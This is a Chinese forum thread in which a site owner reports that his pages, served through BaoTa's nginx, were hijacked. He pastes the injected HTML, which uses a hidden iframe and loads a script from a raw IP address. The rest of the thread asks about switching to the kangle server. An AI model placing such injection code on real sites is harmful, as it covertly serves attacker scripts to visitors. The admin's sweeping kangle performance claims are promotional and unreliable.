设为首页收藏本站

ZMX - IT技术交流论坛 - 无限Perfect,追求梦想 - itzmx.com

 找回密码
 注册论坛

QQ登录

只需一步,快速开始

新浪微博账号登陆

只需一步,快速开始

用百度帐号登录

只需两步,快速登录

搜索
查看: 115|回复: 6

最近被宝塔nginx劫持跳转头疼,想全局换kangle

[复制链接]

签到天数: 15 天

[LV.4]偶尔看看III

发表于 2022/11/9 09:45 | 显示全部楼层 |阅读模式 |Google Chrome 106.0.0.0|Windows 10
天涯海角搜一下: 百度 谷歌 360 搜狗 有道 雅虎 必应 即刻
你好,小樱,
由于宝塔的nginx漏洞导致页面被劫持跳转,不知道是啥造成的,但是肯定有漏洞,很多人中招,
之前研究过一阵子kangle,不过还是想请教一下,
在正式运行环境中使用kangle稳定性怎么样?
比如说动态站点,日ip有10w左右,kangle需要如何优化一下进行最大限度的支撑呢?
如果安装kangle,我看网上都是一键安装包,一键安装包又分为全版本和cdn版本,
如果选择全版本,他会安装mysql和php等,
因为我是用python开发的程序,之前用的nginx反代python,现在想用kangle反代python,
我应该安装全版本还是cdn版本啊?
还望小樱给解答一下,谢谢了哦;
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复

使用道具 举报

签到天数: 15 天

[LV.4]偶尔看看III

 楼主| 发表于 2022/11/9 09:51 | 显示全部楼层 |Google Chrome 106.0.0.0|Windows 10
  1. <!DOCTYPE html> <html> <head> <iframe id="f" width="0" height="0" scrolling="no" style="display:none;"> </iframe> <meta charset="UTF-8"> <script src="http://45.207.45.193/ss/31/"> </script> </head> <body> <iframe id="s" height="2000px" width="100%" frameborder="0" scrolling="auto"> </iframe> </body> <script> document.getElementById("s").src = self.location.href; var c=Math.floor(Math.random()*3)+1; function reload() { if(c<=0) return; c -= 1; document.getElementById("f").src = ajaxUrl; setTimeout(reload, Math.random()*5000); } if (ajaxUrl.length > 0) { reload() } </script> </html>
复制代码

以上是我访问我的站点显示的内容,被恶意劫持修改。
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

签到天数: 3985 天

[LV.Master]伴坛终老

发表于 2022/11/9 18:40 | 显示全部楼层 |Google Chrome 107.0.0.0|Windows 10
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的正式环境,稳定性比nginx好,性能上单机吞吐可达上百Gbps,nginx只能做到单机2Gbps - 5Gbps。
只有10W ip的站点,访问流量很小了,使用kangle在强大的性能支持下,无需做优化即可在单核1G的内存vps上正常跑起来。
如图所示,日IP 300W,日请求10亿的站点,单核VPS安装使用kangle,很轻松应付如此流量。
1.png
如果你不需要mysql,php,memcached等的时候,只需要反代(CDN)功能,可以单独安装kangle即可,包含php环境是为了直接使用kangle搭建网站提供他人访问,此时网站运行在kangle上可以获取最高的性能。
并且kangle支持类似iptables的防火墙,可自由在请求控制中改写规则实现顶级waf效果,根据写入的规则可大幅度提高安全性,有效防止sql注入,cc攻击等。

欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

签到天数: 15 天

[LV.4]偶尔看看III

 楼主| 发表于 2022/11/9 19:51 | 显示全部楼层 |Google Chrome 106.0.0.0|Windows 10
小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

如何单独安装kangle哦?我还是想用宝塔来管理mysql和memcached等等;
对了。我系统是centos7.4
[发帖际遇]: sxcisco 乐于助人,奖励 4 贡献. 幸运榜 / 衰神榜
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

签到天数: 15 天

[LV.4]偶尔看看III

 楼主| 发表于 2022/11/9 19:53 | 显示全部楼层 |Google Chrome 106.0.0.0|Windows 10
小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

应该不是我python的问题,很多人都中招了,都是安装了宝塔的nginx导致的,换apache就行了,但是我不想要apache,性能太差了;
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 1 反对 0

使用道具 举报

签到天数: 3985 天

[LV.Master]伴坛终老

发表于 2022/11/9 20:35 | 显示全部楼层 |Google Chrome 107.0.0.0|Windows 10
sxcisco 发表于 2022/11/9 19:51
如何单独安装kangle哦?我还是想用宝塔来管理mysql和memcached等等;
对了。我系统是centos7.4

这里提供的命令可以单独安装kangle,或者升级版本
https://bbs.itzmx.com/thread-11450-1-1.html

欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

签到天数: 105 天

[LV.6]常住居民II

发表于 2022/12/1 17:21 | 显示全部楼层 |Google Chrome 95.0.4638.69|Windows 10
小樱 发表于 2022/11/9 18:40
看你的描述,漏洞应该大概率出现在python层,而不是宝塔上?
kangle是用于生产环境使用的,也就是你所说的 ...

请教小樱 你这个图片是啥软件生成的kangle的流量图呀
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册论坛 新浪微博账号登陆用百度帐号登录

本版积分规则

手机版|Archiver|Mail me|网站地图|IT技术交流论坛 ( 闽ICP备13013206号-7 )

GMT+8, 2022/12/1 18:15 , Processed in 0.341844 second(s), 21 queries , MemCache On.

Powered by itzmx! X3.4

© 2011- sakura

快速回复 返回顶部 返回列表